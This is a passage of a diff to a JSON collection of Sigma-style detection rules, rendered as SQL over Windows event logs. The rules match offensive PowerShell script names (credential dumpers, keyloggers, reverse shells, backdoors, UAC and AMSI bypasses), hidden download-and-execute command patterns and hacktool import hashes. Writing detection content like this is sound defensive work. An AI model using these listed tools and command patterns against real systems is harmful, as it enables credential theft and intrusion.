ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE 